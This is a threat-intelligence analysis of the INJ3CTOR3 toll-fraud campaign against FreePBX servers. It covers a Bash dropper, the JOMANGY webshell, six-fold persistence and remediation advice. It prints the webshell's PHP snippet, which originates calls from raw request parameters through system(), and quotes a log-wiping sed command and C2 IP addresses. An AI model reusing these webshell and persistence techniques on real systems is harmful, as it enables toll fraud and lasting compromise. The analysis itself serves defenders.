Financially motivated threat groups targeting Voice over IP (VoIP) infrastructure represent a persistent, highly specialized segment of the threat landscape. Since 2019, the threat actor known as INJ3CTOR3 has continuously exploited internet-exposed private branch exchange (PBX) systems for toll fraud. The group’s latest operation introduces a highly sophisticated multi-stage Bash dropper, a previously undocumented PHP webshell family dubbed JOMANGY, and an intricate, self-healing persistence architecture engineered to render conventional, linear remediation efforts entirely ineffective.
Initial Access Vector Analysis: The Restapps Anachronism vs. Modern CVE Candidates
Forensic analysis of the earliest stage artifact—a 23,355-byte Bash dropper (b506fc82)—indicates that while the exact exploitation payload remains unrecovered, infrastructure signals point directly to two critical FreePBX vulnerabilities:
- CVE-2025-64328: A post-authentication command-injection vulnerability in the FreePBX Filestore module (CVSS 8.6), which previously served as the primary entry point for INJ3CTOR3’s January 2026 campaign.
- CVE-2025-57819: A pre-authentication SQL injection vulnerability in the Endpoint module that allows attackers to insert malicious tasks into the internal
cron_jobstable.
Architectural evidence strongly favors CVE-2025-57819 as the primary entry vector for this iteration. While the actor’s previous campaign explicitly disabled the Endpoint module post-exploitation, this variant leaves it fully operational, indicating that its functionality remains necessary to maintain the initial exploitation chain.
Interestingly, every stage of the current payload executes an Apache HTTPd log-purging command targeting the string restapps (sed -i '/restapps/d'). This does not correlate with the exploitation path of either 2025 vacancy. Instead, it represents a legacy behavioral artifact carried forward from the group’s 2022 campaign, which heavily relied on CVE-2021-45461 (a Rest Phone Apps module remote code execution vulnerability). While this behavioral continuity provides high-confidence telemetry for long-term actor tracking, it functions purely as an anachronism in the 2026 campaign fabric.
Multi-Stage Staging and Campaign Architecture
The deployment payload runs through three distinct Bash execution phases to orchestrate a complete system takeover. Stage 1 handles initialization, environmental sanitization, and endpoint hardening. Stage 2 (k.php) introduces the JOMANGY webshell framework and writes an un-obfuscated PHP command executor (license.php) to disk via the FreePBX High Availability (HA) module hooks. Stage 3 (wr.php) operates in parallel, deploying legacy ZenharR webshell variants to separate segments of the web root to expand the operational surface area.
[Initial Exploitation (CVE-2025-57819 / CVE-2025-64328)]
│
▼
[Stage 1: Bash Dropper (b506fc82)]
(Eviction, Accounts, Profile Injection)
│
▼
[Stage 2: k.php (Bash)]
(Deploys JOMANGY Webshell / .htaccess)
│
┌──────────────┴──────────────┐
▼ ▼
[license.php] [Stage 3: wr.php (Bash)]
(PHP Executor) (Deploys ZenharR Webshell)
During Stage 1, the script establishes credential implantation across several layers. It injects a backdoor administrator account (freepbxusers) directly into the underlying MySQL database instance, hardcoding an admin privilege string (sections=*). Concurrently, it spawns 18 rogue operating system accounts. To bypass standard operational audits, nine of these accounts are assigned root-equivalent UID-0 status, while the remainder blend into the environment by mimicking legitimate service accounts like asterisk, asteriskuser, and spamfilter.
Inside JOMANGY: Double-Layer Obfuscation and Toll Fraud Operations
The JOMANGY webshell family showcases an evolutionary leap in the operator’s evasion tactics, achieving an initial zero-detection threshold on automated submission engines. The payload utilizes a double-layer static obfuscation wrapper consisting of an outer Base64 layer encoding a PHP string that executes standard str_rot13() transposition over a secondary encoded layer before shifting execution to eval(). Standard security tools executing a single-pass Base64 decoding string will harvest corrupted ROT13 structures rather than actionable PHP source code, rendering trivial signature matching ineffective.
Furthermore, the outer wrapper integrates structural dead-code insertion blocks targeting heuristic detection subroutines. A hardcoded watermark comment is injected into every runtime instance:
/* trace_e1ebf9066a951be519a24140711839ea */
This string serves as a uniform campaign signature across all victim environments. Post-authentication, the primary objective of the web panel is the direct execution of telecom toll fraud. All JOMANGY and ZenharR instances contain an integrated VoIP translation module that bypasses the PBX graphical interface to interact directly with the local Asterisk subsystem via shell invocation:
if (isset($_REQUEST['call'])) {
system('asterisk -rx "channel originate Local/'
. $_REQUEST['prs'] . $_REQUEST['num']
. '@' . $_REQUEST['context']
. ' application wait '
. $_REQUEST['time'] . '"');
}
By supplying raw parameters for the destination country code (prs), number (num), dialplan context, and duration, the operators force the victim’s own Session Initiation Protocol (SIP) trunks to originate calls to premium-rate outbound networks controlled by the fraud syndicate, routing the financial liability entirely to the victim’s carrier invoice.
The Six-Fold Persistence Architecture
The defining characteristic of this generation of INJ3CTOR3 infrastructure is its self-healing, cross-protecting persistence topology. Rather than relying on a solitary execution hook, the campaign weaves six distinct channels into an interdependent mesh where any single surviving component will fully restore the compromise within minutes:
| Persistence Channel | Mechanism of Action & Defense Layer |
| 1. Primary Cron Polling | Installs 8 separate cron jobs polling the C2 infrastructure (45.95.147.178) every 1 to 3 minutes, executing payloads under randomized system binary paths. |
| 2. Shell Profile Injection | Appends Base64-encoded download stagers into /root/.bash_profile, /root/.bashrc, and /etc/rc.local, executing on every interactive root login or hardware reboot. |
| 3. Immutable Cron Backups | Mirrors the active crontab across 8 hidden directories, applying the filesystem immutable flag (chattr +i). Supported by two internal validation loops that overwrite active crontabs if altered. |
| 4. Process Watchdog | Runs continuous pgrep checks against the primary beacon process structures (zen2 / devnull2). Triggers an immediate C2 payload pull if processes are terminated. |
| 5. Monitored Webshell Tree | Spreads JOMANGY across more than 12 discrete paths protected by explicit .htaccess rewrite rules and chattr +i attributes. Each shell can trigger a full cron reinstall upon receiving an HTTP request. |
| 6. FreePBX HA Module Hook | Plants the un-obfuscated license.php command executor inside the High Availability module path, supplying a continuous backdoor hook directly through legitimate framework tasks. |
Ecosystem Dynamics: Automated Botnet Migration
INJ3CTOR3 maintains rigid control over its operational perimeter through an aggressive “competitor eviction” sequence executed during Stage 1. The dropper sweeps local directories against approximately 50 known competitor webshell signatures (including b374k, t3rr0r, and b3d0r), while applying strict bidirectional iptables rules to drop traffic from 11 rival Command and Control (C2) IP blocks.
Remarkably, this eviction routine explicitly targets the group’s own prior campaign infrastructure. Stage 1 searches for and deletes the unique marker string (bm2cjjnRXac1WW3KT7k6MKTR) and the “VictamPbx” webshell branding that characterized INJ3CTOR3’s own January 2026 campaign. Furthermore, the group’s former Brazilian C2 IP (45.234.176.202) is placed into the localized network drop list. This configuration proves that the campaign is not an incidental compromise wave, but a coordinated, automated botnet migration designed to shift compromised assets from old Brazilian nodes onto new Dutch infrastructure hosted at 45.95.147.178.
Our Opinion on the INJ3CTOR3 Campaign
The 2026 INJ3CTOR3 campaign underscores a critical, often underestimated reality in enterprise security: the severe vulnerability of specialized telecom infrastructure. While standard Endpoint Detection and Response (EDR) matrices heavily police traditional corporate operating systems, Linux-based PBX and VoIP appliances remain significant blind spots.
The architectural sophistication demonstrated in the JOMANGY deployment reveals a clear understanding of typical incident response patterns. By establishing six interlocking persistence channels, the operators are explicitly banking on the superficial nature of standard remediation. Most security teams, when alerted to an anomaly, identify and kill the active malicious process or delete the immediate webshell file. In this environment, such linear steps are useless; the immutable crontab backups or the profile injection scripts will simply revive the entire infection loop within a few clock cycles.
Furthermore, the automated botnet migration highlights the long operational life of these compromises. The fact that the threat actor can systematically evict their own legacy 2026 infrastructure across hundreds of hosts shows that they treat these enterprise networks as stable, long-term operational real estate. Patching security flaws like CVE-2025-57819 closes the front door, but it does absolutely nothing to evict an actor who has already thoroughly reconfigured the underlying OS persistence mechanisms.
Ultimately, this campaign proves that once a PBX host is compromised by a disciplined actor like INJ3CTOR3, incremental cleanup is a failing strategy. The only reliable path to remediation is to completely burn down the host, provision a clean baseline from verified media, apply immediate updates, and isolate the management layer from the public internet.
